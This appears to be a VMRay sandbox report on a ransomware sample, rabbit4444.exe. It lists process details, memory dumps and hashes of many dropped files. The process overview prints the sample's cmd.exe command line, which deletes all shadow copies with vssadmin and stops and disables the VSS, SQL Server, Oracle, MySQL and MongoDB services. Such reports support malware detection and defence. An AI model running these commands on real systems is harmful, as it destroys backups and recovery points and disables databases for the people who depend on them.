07de2347...632d | Grouped Behavior
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Ransomware, Trojan

Monitored Processes

Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0xcdc Analysis Target High (Elevated) rabbit4444.exe "C:\Users\FD1HVy\Desktop\Rabbit4444.exe" -
#2 0xcb8 Child Process High (Elevated) cmd.exe C:\WINDOWS\system32\cmd.exe /c @echo off sc config browser sc config browser start=enabled vssadmin delete shadows /all /quiet sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWriterORCL sc config OracleVssWriterORCL start=disabled sc stop MySQL sc config MySQL start=disabled #1

Behavior Information - Grouped by Category

Process #1: rabbit4444.exe
28734 0
»
Information Value
ID #1
File Name c:\users\fd1hvy\desktop\rabbit4444.exe
Command Line "C:\Users\FD1HVy\Desktop\Rabbit4444.exe"
Initial Working Directory C:\Users\FD1HVy\Desktop\
Monitor Start Time: 00:00:30, Reason: Analysis Target
Unmonitor End Time: 00:04:30, Reason: Terminated by Timeout
Monitor Duration 00:04:00
OS Process Information
»
Information Value
PID 0xcdc
Parent PID 0x860 (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x E84
0x 474
0x 384
0x 390
0x D98
0x 540
0x E00
0x 200
0x CC8
0x 2D4
0x D44
0x B08
0x D1C
0x 7A8
0x F80
0x FA8
0x 60
0x BEC
0x D58
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
rabbit4444.exe 0x013D0000 0x01417FFF Relevant Image - 32-bit - True False
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\base.js 1.22 MB MD5: 055ca7ebb18e13e34032754e8075b68d
SHA1: 4a45b3bc48db559b91a0e3bfa60fef8dbdd14049
SHA256: a86143c5a87ff7727a9586de927b95ce4671f4f613f261a5ae448afedf85dbff
SSDeep: 24576:ubRf97WM1xAYOFVWocsoNlqMio8qjJMrFKxb24PRP5rEzCv3HbF1CJvUgt3:u5tWM/AYGVWnNWfqjKrg245PZEg37oV
True
C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\ui.js 2.91 MB MD5: 87f26cf7db700f86de6a4f9cf02d4e54
SHA1: b5771dca693a5c3f0b184c87d985faeaa4d6537a
SHA256: 199ade7a0e76e1b8c964f2f8468098ad124b9e0f594c22fdde8266bd0c639eea
SSDeep: 49152:ktccXuyKGn8y0btRe4Ycp53BAyywEzG8WWEIHYgFQAorRDVLrfT:8c2dKgOzNp532aOHYgFCVx
True
C:\BOOTNXT 784 bytes MD5: 4d416c18fd345bcbebf2cedffd906d18
SHA1: 936879f1c04b2e4eaa792c81c9ce5e85faca26fd
SHA256: 627647114060847246a5f9c8089190307d59e1efaa6aa37da0e2287b318ec6c9
SSDeep: 24:PILljr6Qhbv2runUmOt3W9+93LnszrS8GPXf:PINrHbgunHM7Nvf
False
C:\Windows10Upgrade\DW20.EXE 629.45 KB MD5: 5ad30920efffe36e0baf1db5b9b9e923
SHA1: eeb9d0c95a8267b8146367c5f80a4bcd6380fad0
SHA256: 30671d825245872dea4c6a9d1190a4a53b200e10b2ceab71f26ae3cdfbd2ecb3
SSDeep: 12288:GYOOkWJLYFPVv9UM+N962Scht7aMci/P/e5GolvtlwvtDNciRG:GPjWJLYFt9McYnaMElllwvtLA
False
C:\Windows10Upgrade\EnableWiFiTracing.cmd 10.34 KB MD5: 4c6eb227eeb4809b10fa6036b4c56cd9
SHA1: 9e23f6c52e6a125d7c5249864da51abafe0e24ae
SHA256: 109a092e4d62356d208e6e26e95982a9caee4d99c30781f10fd2a47083fe3a78
SSDeep: 192:O/6h1h9K9/V55JNd5Ky+l8sZ3EmWBbYiFJHhZFXomZlRMlf:OchA9/V5jp+SUEnbrhfomG
False
C:\Windows10Upgrade\GetCurrentRollback.EXE 72.45 KB MD5: c235e1e30d0e1068b3cfea9ac863e900
SHA1: 08b61eac3849da24191d10f426a67c546687af83
SHA256: ba6639b1f11c58f74d88cf46cded45b3d6be03d3fde47975630746575411eee4
SSDeep: 1536:Kp9dJ4eNa3bniWVSQMqG4W1v+dunztVAPgGrBG3WTjDmVHEK:Kta3DFYSWAQfAPgGrBHTjDmGK
False
C:\Windows10Upgrade\Windows10UpgraderApp.exe 1.35 MB MD5: fe88d94cf0c137cdd05bd35c92179233
SHA1: 1720ce68232f0c2b954a1a69ea2a98a80abc6f30
SHA256: 2274b158e0c389fffe435cd8f407ae1271f0ed0006dde368ca261685df271e7d
SSDeep: 24576:w8UI/dzOi3TzIFRQHVqHcVmQclXH2SnX6uXVbIpPu5qFBr7C8HrYUCf:wUOi3TzIFRQHVqHcIQCXH21u52RIf
False
C:\Windows10Upgrade\resources\hwcompatShared.txt 806.78 KB MD5: fea3f4927a54eb28e4c24b39f7385c74
SHA1: 038a2f01d7fa8f3719446452ec58fc5c95c76aa7
SHA256: f3db1ad775a24e7b0738e9e6c66d5b65805ebd856cd0b9d7dfec54c6bf14b64c
SSDeep: 24576:BHNm18kniVzqBiv75RVP4QYkZIJzBeoCdoXYb1i35zNYD:BH4hniVzqmz54hkIHeHdoXp3BSD
False
C:\Windows10Upgrade\resources\ux\block.png 1.66 KB MD5: 48eb2a854a995ba2d9ef3ff15c4307df
SHA1: c79fff2c7cf82ccf3ac1af055ca47e4bf47ce144
SHA256: 15d677594b9fd2225a99c5be949ae871b46a4b94ca6714fc0003712f8f51d3f2
SSDeep: 24:n39Qip8tfPurJ2v2qSNR2Sw5/VVparRJ3AgOR9Qw7W8b8rWXNFUmOt3W9+93Lnsm:3G9tfuFxWW/AgOv68b6WXNFHM7Nvf
False
C:\Windows10Upgrade\resources\ux\bluelogo.png 7.67 KB MD5: 60dcbfac430057bff744fcc34fb1e842
SHA1: f178a95e18c6485c2a218c0780d839d6dfc1b231
SHA256: 4043813dc9e26dc85e1bb459ff9ae6982c540afc32f634a3a44efdff547b5b28
SSDeep: 192:h5CBtjM12WFxdjmoZ1ZvLaydUhNqgcdXZtf88OXOqz0i44Mlf:h8nQ92oZ1dHdULyXzf88cpzL6
False
C:\Windows10Upgrade\resources\ux\bullet.png 992 bytes MD5: 2dc6c610854e55c4c9b4c672a91b6652
SHA1: 677653026a4db08f9e7fef337470c10b3d0d0536
SHA256: 5e5a94b6496025b59b1c7f6e4f8cacbb413ce4ecf65a10ee376ee6be987a2bfe
SSDeep: 24:SKPkiVvcBZLxJqZjLmxxKHPKbUmOt3W9+93LnszrS8GPXf:SKMiVQWZXKxKmHM7Nvf
False
C:\Windows10Upgrade\resources\ux\default.css 6.39 KB MD5: 583cc5d7a7b381fefdbd62115948bcfb
SHA1: 490076ae82b8491da4653def84d745f99efe63d1
SHA256: e7c90308e19c93de538f8a2b0a14fbd79a9447c84578622f80c0e70ee380f842
SSDeep: 96:VAlcIC8sLtbjGLsThzELVW9EDpuY4O0VXZT2Qgs6sDRaKjd0gGoBq2HiM7Nvf:VkwtH1ThYJCopuzBssnRaKvzCMlf
False
C:\Windows10Upgrade\resources\ux\default.htm 61.83 KB MD5: fe1a88e96e6aafc0d55e00f5c94e8f72
SHA1: bc80ba4bc8f18fa6b622b075625ee8af6d1e370e
SHA256: df7a3b54e721b96966922d8ee99daa0e3708c20a4a4f2235420af4dfd31c053d
SSDeep: 1536:VUzafpUqG+ToFZHhW89X1bzYS3yVDqF2ZFPv1IUivD9c2Dxzu:Vm+xFTytbzTuqaPtI7vDFxzu
False
C:\Windows10Upgrade\resources\ux\default_eos.htm 55.31 KB MD5: 5b42ce64d19335afb9ea02aa3a4b9b33
SHA1: 779c08438e2bb4cdcaed01773b73d6e88e963673
SHA256: 42f580f123e7fa954640e311a6d4740bf734eb8517a7f5105e0ab2dfef219f47
SSDeep: 1536:hLhQrIknpJge6rYuSZvE0D6hfEosWRsT4Ccm:dhXQOrRSpE0D6hst6D/m
False
C:\Windows10Upgrade\resources\ux\default_oobe.htm 64.92 KB MD5: aae603f58233d77a86457eb7e3188494
SHA1: 1097e26fdd9c5d06eb3c4748317dafad56aec72c
SHA256: f30fff6dbe36cf3599bffd4ed11be359b05bf5cf16dbfd6fd39bd524b541cdf4
SSDeep: 1536:XpZRtuAq+Pj6ZD3qNyJJSvUeorjhQmJ9V73ZT4CSyXh:ZZr8+Pj6B3zJJHe2jGmB9T418h
False
C:\Windows10Upgrade\resources\ux\eula.css 864 bytes MD5: 56ca9bd9a8389496f473f53e94bda21b
SHA1: b0248052852789abc1b7e797fbd82d2b1b1d72e5
SHA256: 7b490cee869f8b435f9c2255176d0e6f6f90cecf58488e6b293a93b02c6152a5
SSDeep: 24:nrQlhYLhA0bDUmOt3W9+93LnszrS8GPXf:nrQLYH3HM7Nvf
False
C:\Windows10Upgrade\resources\ux\GetStarted.png 4.48 KB MD5: f9778909ed5d5cf7312772b32b81f638
SHA1: 88a1e6c495b06c45cddd6fb23cfab0252cbe0d7e
SHA256: 1e2eb6a603ad28a3351323304cd0378b8f99c6e0bd9b4039f798120cbf5859e6
SSDeep: 96:cfRgqgrA07G1lRO2RQMl1MYwOHXCIeEOmE2kx/i7M7Nvf:cf+k0SjhRQMJTteJN/i7Mlf
False
C:\Windows10Upgrade\resources\ux\GetStartedHoverOver.png 4.73 KB MD5: 3814b922a7fe95fa54ee0df474c159c7
SHA1: 39b7d14333925e54dfb7b86666f145856f68630f
SHA256: 89cbef73912d0340e6ed4814acf86c0fb65c69eab1b755b97d7c5d5b64eb3915
SSDeep: 96:MKawWJldbBnFJrhKugRRlBFWdamkdm12ub6djLpt7fHAoAap+M7Nvf:MXwUfVnFJdi3BccmkE16pVVWa8Mlf
False
C:\Windows10Upgrade\resources\ux\loading.gif 17.75 KB MD5: 2880863b57ec4f20b2774feb9cf11c99
SHA1: 5dc22e0ef21413b87b1dec8b4d4f1a6bbf377c53
SHA256: 8527069927f421b8391c50065c7d2e5be478f6a28d18eb2365111d0012c2753f
SSDeep: 384:dMQXihuuAOv51oq47P5OU/Zi7VoJXhTPHgvqcEFHSzhI4Y2A58e:t54R1oq47xTRiRmxjHgicEEip2A5p
False
C:\Windows10Upgrade\resources\ux\logo.png 3.31 KB MD5: e2f9790777c66236a7b39ce2a29d2ad5
SHA1: 810058946dd451b767894c564030dc88c45a61d5
SHA256: 80fd0886f55bb5c1f44b6bad58a697244c0cdf04d1c637973a3d900522c8248e
SSDeep: 96:esxTcsisk3ihsRkn3CEB/hFFdFuMUK6IqPy2XM7Nvf:aEhsynppFRYPVXMlf
False
C:\Windows10Upgrade\resources\ux\marketing.png 1.23 KB MD5: fe067f26e12f1f872361c493e8f63b88
SHA1: a14d7d7f473dd7156fe6e9ee1d979f27321cd11b
SHA256: 82f00d7282ee809bd30b825e0c2688a8eb40f90c1c12e8a66a0cf64cd6cbb2fb
SSDeep: 24:aETaR/AWa0N488kqhb/rw15psUmOt3W9+93LnszrS8GPXf:FaiWa0Jqh/i+HM7Nvf
False
C:\Windows10Upgrade\resources\ux\NetworkIssueFAQ.mht 608.27 KB MD5: 657c65f3c77a24950ff99efc89770af6
SHA1: b8a70c331dbe41bfdcd45a45cf34bbf699f72ef7
SHA256: eb27fc9506d8390a7c38d1f12888e722ee5e7b720abeb593fed648f13c8adda9
SSDeep: 12288:7p9BytBaHJUATKhyr3Vr0i6GeVYrWECrQuajuGX8CbXrPy1C42miEnM:7pPykHJDi03VSGeDECr/ajuabXrPy1Mx
False
C:\Windows10Upgrade\resources\ux\NoNetworkConnectionHoverOver.png 2.92 KB MD5: a3bcfc82cb917079283e6013c4e0cb84
SHA1: acd92223afc44c4ecaa792bb868a246d2197f8f5
SHA256: 85cc45062a053ca8fc23e737b7cb4ec93513d8bd6294ecfe4c93d051098d2857
SSDeep: 48:rgbka8HAodk6z6zJMEXJ0iNGc7OKzoECVlmavJmetNGtVNHM7Nvf:rq+6zJMgJ0iNGybBGU3bM7Nvf
False
C:\Windows10Upgrade\resources\i386\BiosBlocks.xml 90.25 KB MD5: 2fc363177b38064fb508e045d5138431
SHA1: 7001525c52f37148b83765cf8f41ac255366f722
SHA256: 8bc90a5e9fb17e3ee56862c268b294de7cc68ef889f161b2913e4730f7f777b5
SSDeep: 1536:lyhx4xXjPr7CsRA33e/uiRZEhkCopeeedkf0KqtSLspKvBNoGNJFJUseJZMVKqrm:lycisili8hHoceedpxtssKoGTFJXePOS
False
C:\Windows10Upgrade\resources\i386\hwcompat.txt 16.88 KB MD5: 87ec29ff89d3f5b4647931a713df70c6
SHA1: 0ac823f5b5552153f2bec1032798ffd451cf7f59
SHA256: b3980a945f0e52f066e8d8003cdf86a4aab99c86eae11ea54069b060807c4833
SSDeep: 384:qsIQgme0CUuDR8cM3Est5YVFc18WmclvfPgF:qsI1PDWcNUYVF9cdQF
False
C:\Windows10Upgrade\resources\i386\hwexclude.txt 2.97 KB MD5: 32cb7baff922151966309455b74f7717
SHA1: 36f83b124db2183c1a6727895ec749b5962c1957
SHA256: 4cbaeae4febd98c6f35e5eacc1a150119e60c32528126c812c74813a5fb91c84
SSDeep: 48:vA94/N180JDi8TpOldJGXFRvrCNXUsl7elbk6/qrly+mHM7Nvf:vfo8YlKRjCOsl7pOqrlPYM7Nvf
False
C:\Windows10Upgrade\resources\i386\nxquery.cat 10.39 KB MD5: 2e43358f8babb960050c872ce2ac95ee
SHA1: 1d700fe4e307d88670ae28af74c7c442911db012
SHA256: be03b2df0aed86a95d40bf507e9dad26c4f76d26dab42b9caeca5faa9c437f5b
SSDeep: 192:dXGuONLI+dQeDD/M6A6xUS5DZOyAWIk5CMaUD2lMCMeqf5n5rJCc5D+8Mlf:dSVQ4D/9AkpZOyAWIkLaXlJvkn5rV8
False
C:\Windows10Upgrade\resources\i386\nxquery.inf 2.22 KB MD5: bd4a38de6c8c8f63d1ca527c542710bf
SHA1: 47ee2732f0f81d4533c6d067f1b1f62f17e5ef09
SHA256: 476f013e67624aea1b312edee287f5160f9217383d723cd5602ab7d02056ad57
SSDeep: 48:qZhZNJ8770iLf1G82Hqxl2ZDbsMZA6ubppiPQHM7Nvf:qFTiT1juqxl2pdbsppnM7Nvf
False
C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\oobe-desktop.css 40.75 KB MD5: accc0f71ec8ec91570b04ec8d1bca633
SHA1: 3e9b6c5db75b062f08cc91519620d4e0bbeae3d4
SHA256: 6953349e67f10a291fa8a0126d6d7184f2c4db19c71655e158418b2aead05039
SSDeep: 768:F8Br2N1ukFMRhXagIj4oMrB1q0DzARaH2e3u1Ig+1t3fmjUyUt+gaVMFU:2Br2rukFMzQCDq0weYIrzPmjS+gaVMFU
False
C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\ui-dark.css 263.61 KB MD5: 69d8edd486c778a58bcf9a753a7bb39f
SHA1: cbf9b9223afbd0946b3a33883368d60b24e8ad8c
SHA256: c3131fa8bf36c31db9f2a786bc212046cb494f9c4f683ecd9042adf03425fe1b
SSDeep: 6144:MQQxxSoVsUqJVy0tpHYL6lzYcH8wx3a6ip3oCeVz/:M1soeUqJNta6lMcjda6yolL
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_ar-sa.htm 108.61 KB MD5: 89af02db1d722a14787a092316dd7f37
SHA1: 2503e44903b737d39ab51ffd75285dc353362bb0
SHA256: d4db4142bf38658d3f67faf00e17883c4368432203ef56e67bd56919dc482a41
SSDeep: 3072:r+OHen+d9jpxViJCyrspX3vIYrg5oHyLYLf/wQocaH4:ZHb1x4oyrWXfZ85oS074TcaY
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_bg-bg.htm 248.27 KB MD5: e5378bdae9d7f2b1e009a1a786f60874
SHA1: 2fb08f72cb9ad9e431b0a3a08b6aa6cd672f0031
SHA256: 00687167ce6d2b2df60b3bd843386bece4d2ddc4fdb2ac6d02e6aefbaf89c9bb
SSDeep: 6144:DbZWzcDxyfxdG1S73gUkQUtCAp5+kmv2xRuTl1Xe9ehnmb:fZXDxyf2EjgUkQUtCaA2I5e9nb
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_cs-cz.htm 82.12 KB MD5: a00d219392673464c750b125e8520e54
SHA1: d509882d73d35c98df83e2b9b482784cd3b9087c
SHA256: b25bf24c18bfa34f480ea85b502b16332ef60fdb41a8d19bb7287f2b23d10d29
SSDeep: 1536:+yTYvzGk4cPq70QmTdwJwK7NtiAK+TGfuiunJDDiscUWXriDL1QgqXkGS:fTkGknPqIbTGwK//XnJaZUWXripV5
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_da-dk.htm 64.41 KB MD5: 313dad35973fb3e2e961fceaf76220c7
SHA1: a947e2fc91fb19e0bfe7a19aeb71a3c1677fd4e3
SHA256: 6152d97a2f39197cd4b5ea2d472f071ca8cbe992e3219bbb9baae3e44a883175
SSDeep: 1536:GR+i2VR7Rrj1ajLYyOtSiPcBvFVW6Mn1YVCy17TVEz:GEiER7RtiMyVdTfK1KCy17TVEz
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_de-de.htm 69.56 KB MD5: 38f847f0e2590e76ef4bc5149c1a1ff5
SHA1: 5acfc0c56bab53bd5a57a243796134637a49ff26
SHA256: 2eba957d7823606137d12567ca08a3f17d1c2f06b9c177a18d9b70a98225a5ca
SSDeep: 1536:N+gmglcqjchxomlb0FJ0LtNsEjTHLVOp7U9lxiumn+xcqQgnt6KSLzu/fnYX47ik:+gCrJAFCAqTr8p7Wdm+xcqQot6Keu/fF
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_el-gr.htm 234.59 KB MD5: be9899d744320e5c483e1f7f537acc9c
SHA1: 17fa2f61f64a88b3e0eedba0ff7c0d419b1e550e
SHA256: b7dbf98a79ab9ef9303ef0ced79fdd2a56a92ac44a897d7b3ee11331065d6019
SSDeep: 6144:CAeUvnR2UtoqHK4IqAXh2krZAfdXoZZT46x0:CCFdAzFAV4ZN46y
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_en-gb.htm 57.94 KB MD5: 81289c06d0bdc5ace1bf76dd46b59e73
SHA1: 6d4a121b030982a29346fe77311cbe944788b100
SHA256: 1d67894550ee8c5e05d34fe6c6c8091d72ea76acdb79d7d79b5893735bcba992
SSDeep: 1536:vks3gvMK988hrkOAWXsDPxeIzEm7IG/JtqzFv:8RvV8MrkXXom7hDq1
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_en-us.htm 57.94 KB MD5: af280df9068feb7574b8ff557ec4cfaa
SHA1: 42e64928d485f0f13f55019b07eb72bb509e90b8
SHA256: db68d0b70cd2ec2624f42447c8314f93c4f595418c3b9bae26700f6127514d98
SSDeep: 1536:8yxtW7NHdX7rKRmlAM3zSllenn1f1XIRcJKhU:Txt8H17rKR/QGM19rKG
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_es-mx.htm 68.94 KB MD5: c2fa31586984698186b97bce2e217f11
SHA1: 7d3cbf4620cb27a1f58572e362646039e52a4dff
SHA256: 3c4487e662852039d0076144a2895e012007eccf6ff00c075e96649927c83783
SSDeep: 1536:4n2BBKaQo5vj0Ap0Axsmp9ZVl9tPSNkR7YkI+NTGPCxzSwCq:4235vN++/Vl9ttPIy2wCq
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_et-ee.htm 62.38 KB MD5: 524d9c01fd51717d3ec94bb60e1f8d91
SHA1: b3cefefc6f198f22582e944de5e80f94cf1cc317
SHA256: 58b3dd7d4c0f166cf774452ab73840d96891581ec49af004b4b67bddf082f9d1
SSDeep: 768:PMnJZJeJ0TLmva5TtrYh7qEokMieHK2Yvmt8hzutD80EsVxXHI4xo1ExTtpinnW9:PMJojvi2TCMmS9mJEsLXHRviJ1GpyO
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_fi-fi.htm 69.84 KB MD5: 40969919f48e1e54693b672fed36b820
SHA1: 181f2d5d20bc8c626d3c4c18552075fc516d3401
SHA256: b35e7892c34c1ebd68400ca1a02fe570bf56e172f8c71c7a25ecd1d51d9a6604
SSDeep: 1536:jd2tr0jmnsOiplBXPJLO8F3wP1WKlnc/yVZLM27yd3sef7:B2jpiVlO8FAP1WKCy7M2OJD
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-ca.htm 68.52 KB MD5: 33dd936df2678bf4b69c3dee102494cd
SHA1: 9f2152509937588d4355ad8270eb76e235830107
SHA256: 06b1e03a900f692e71a92b52f2bd09766dfb12b3c640430477eb6d21a29c369d
SSDeep: 1536:jMgmaugVeyN8RFHVklsZmuZliAOImdsUwrfsxb:jXeg+928tZlFO65fsxb
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-fr.htm 68.52 KB MD5: ed3e4d5526f37eeebc3795f3f60d84c9
SHA1: 07152148797ac5d2113661ebbca07971ef1aebe7
SHA256: 2f7f88240f595680e7bab2b09f90cd28edb76698d76c810181e302723843ee25
SSDeep: 1536:SgpaNMLxU/g3IeQ0rM5ZE7IK1lWKNjAYa:SIw4YDAaeNW8m
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_he-il.htm 845.14 KB MD5: 9bf801a4d0bae94dc7ca2b3de0351c15
SHA1: e421d3c188bda1d0a5310841b6ccaa6e9e94c7cb
SHA256: 65ea7a1e612b5e3dcc80ce86f353a8b210cbc421844745c4aee37917fcdf072b
SSDeep: 12288:dGPhbFDMD9SnjshTS5bvdy8loUfa8DAJYDzdt3PKmjQBpOpYBLqedNp7Q:d2xFKQAlS5Ddy83SG3fdt3SEpYdqO8
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_hr-hr.htm 64.11 KB MD5: a7d70abf0537b322c856576dad76edb0
SHA1: 6ffcb532f914fefd232361840ebb049d4e3f9237
SHA256: efc01e01008bd30bee7168351ace19974c268a94b4046560e71e7a0b023ca4c7
SSDeep: 768:zgi/P00oqWBdHU+2Zd8ZlYAd5ZLMB2QD/Dm43qn08zrug+aayrxWTWzDVK1CW05l:zt00rPlADZLG24D4nzz+aldm8ljpQ+Td
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_hu-hu.htm 83.34 KB MD5: 0e6a47ed1318c86914fa2259c3222996
SHA1: b57c27a00dc77b575a3e5177a027d2a10ec86af8
SHA256: e0341b0d7018596b764b444fcb5c63d615bc878dd99f6112e959751b1ea7c7d7
SSDeep: 1536:+TY5fh5ZvfGKCpNzPJ07o3L6ooEWi6iv+Sbsoaqe00bjD05JHETPC/u22lgoSpz3:+M5fhv3GlzSq15L6i1Ijr00I5JETPC2q
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_it-it.htm 68.61 KB MD5: da76c1e23b397fb341f32f11ff49d3fc
SHA1: 88bf924759b80ec7513397765abb326f30c471c6
SHA256: 3bd0aa5e7506b0d05a67c9c7d36880cae176c5305bb67c9d355fbaf17fe10335
SSDeep: 1536:UFDwozrQs3kbejdlR2n1Fuqd5rY8E3tDdLE0oQmvTRN/hFI58FsARZpFjQ:qDwmr9bu3ug5CDw9rXTEARZfQ
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_ja-jp.htm 206.08 KB MD5: 8d4ba73f775e8f4a9b3c889988c97dbf
SHA1: 648bcd2dd31374ec236988f2ef9754e82816f6f0
SHA256: c6a47c172a285a9cc7d9203f9d57f5df488653968a813b8c12dfa597d935e4c7
SSDeep: 3072:6g7cGdiG36FTPiMw3YvJwZyK2xeP6JDUDnvy9DUhy2Xga5AXkLVvrZvnV:6gkG36Rav3wawtxecUTsDUhbQtkhrVV
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_ko-kr.htm 619.98 KB MD5: 6b24ae85259b5e22358b857c4783343a
SHA1: 0ef00c7fbd0ed312f0c36f9fadd200da9d7bb997
SHA256: 16dc096541d43c023cfc3a58dcbd06cfeec5bba87b5d85d18013742cf9e9541a
SSDeep: 12288:SAM6ICG7Ey3Nj7rhPrKepGaTpgzOc1BWJqVRh8zmK7rZJQ9:SZ6ICnyx7rdObaFgjDWYVR8TI9
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_lt-lt.htm 75.06 KB MD5: 9bbc8e486733faf028169f9bd7537a5e
SHA1: 464a138468368895ffd5987244e00b9e93bc6104
SHA256: c946ae58e01a515544adeaff73e6573fa38723d0932942b584499d8b5ca302c8
SSDeep: 1536:7sS9e30ESjHGDiORMrJsysounYUmj4YBuNy4D8elQ1LalJFUIPtrT:7d9e3GzA4JsthDkJBuBIeMOTF9trT
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_lv-lv.htm 82.70 KB MD5: 43f793b30c309a4461d2993f8540241d
SHA1: 1c303c8312a3147538dda94432bcb6298a208c13
SHA256: acba73a1a4d423ad507708e563b936894e2c11ca6ea65c84953e6b86495806aa
SSDeep: 1536:vukcIwDyN/vAR1JU9Wbezeq3U3mxC1HfwcR1YQZ1a06mfnQhdI:94+N3m1JGD3U3PecjYwg0vcI
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_nb-no.htm 66.38 KB MD5: 66a8f09c09ef5ec1b798e79671508fa5
SHA1: 0d0f0d3485c7c1f12cde195e8f6183e9962b5e4f
SHA256: bc2d9c85ca7623a0c737f6241367b31b55f5a13458d10520252572bc021e289b
SSDeep: 1536:zsNqjXiVgiqr4qVEpepeWD6OhW023qhYyK8PKr:z9jSeiqrzV+HW/HyqNCr
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_nl-nl.htm 66.41 KB MD5: 9bb99e0239358ee5c2a5a0e57c87c020
SHA1: dea7df26f33b1dd4ef6ddc48540c42c1f234d793
SHA256: d32bcad00bc92a3f9a25e593aaf76f0fd5c363d4b581f721ef7acf0f9ee20fa3
SSDeep: 1536:dtxzmO8wRGBmwO7o3FFBIGBaAE1Gh14VyomxyBlecwNbI:dtxzjnGbj7eKLh12sClexbI
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_pl-pl.htm 80.66 KB MD5: 4c070e3b6862a3eafe47722e9037e31c
SHA1: 08dc129535be52cffe21af0fc4e3ee354689124d
SHA256: 5e712c9cf4b944552abd8d19d5b13b6270a58d9ee7cc1672d1aa0a9db8ae0c60
SSDeep: 1536:v3vJNOovdanYRuRZ3msJGm8k2imImgWQliw5UiNc+fk6eS:pNOAd3MYfkKGJwOU3+ftb
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-br.htm 67.45 KB MD5: a6636c8923c3f84276c6f38e32e6c1c0
SHA1: 044800749912dcd034655323cb690c5171d8c34b
SHA256: b4cc5cd1bdaf8be0b6cedfd0c6fb9ca65e6d6195a960a9b6b3a3455973470686
SSDeep: 1536:HFa0rFxxuNDElAagFMVGpNMlh920H+WiW1BYnecLvis3NStzH0/j:HIMxxuNDIAay4IMz8W1Kecjv3NStU
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-pt.htm 70.14 KB MD5: a2cc190789586e9321ae38e2bf873ad3
SHA1: ab6356331c124f38a4c104e1aa67f23c73eedfeb
SHA256: 4a498b217244770f139a1fcd97ffe50f0c5019bd12479214b2ac2ce57308d3a7
SSDeep: 1536:4WpCYLnPqRcgYcR+WcLectkTA/voE3mDDzWPJXP5Pu:40CknPlgY0dKk83rmD41BPu
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_ro-ro.htm 77.09 KB MD5: c47341b4fa9d6dfd894607d802689878
SHA1: 2a07d0f937a90dd4e5afd4658196f7249bda77c6
SHA256: 5dbff4ecc01f3b036d2c716ec9fd4b2264a285183a056a2783bc9d396569de4f
SSDeep: 1536:qgrvs0dRC3lho8OhSTmK+BuevIOjtAvP7EnJTDyvmn9KmJ7eX1B6fSxtAhs1bvZT:qevsQ03ljQGJ+chEtAv8JTDn9KvB+SxN
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_ru-ru.htm 277.95 KB MD5: b40d1dac7807d1f83cdef720e9270fc6
SHA1: 994ddf71e7619c98f6aab1777cfd023d85f6170e
SHA256: f7da74ffe2be503b3bb461223ff81a42b80ac1287b703008ecdf0f8a7aa15ce8
SSDeep: 6144:Gzft9P3NFepfA2a+7ncG/KehamMKUsHHdIhmOgYGc:Gx9P3N4ZAJencGdhaTKUQIgOgTc
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_sk-sk.htm 80.80 KB MD5: 1f1ff18771f714b80c910e3e780ae5bc
SHA1: 5ba6d13a600d497a64cb66078fe01cb2c42bc2a2
SHA256: 7909c002571d8d480bddd9631d5983f54013be23d19c989b61b6f039a2179900
SSDeep: 1536:kBGrqw8CAZMhwwWhJFhAd/39+c01Gm3iURS4s+7dPARPshRpWlm4DJp0AKl:9rqwKCGHrAR9+c6GGiUrx7CRPshWtdpk
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_sl-si.htm 65.36 KB MD5: ce323330cee9ff33e3c45722b2a9a6a8
SHA1: d478c168a0f22f6053bfa07df8cb4aa2198e86e3
SHA256: af2de489791cf2eebbcbc9003145e1de4e59f50edef61ac769e42f4b42e5caa4
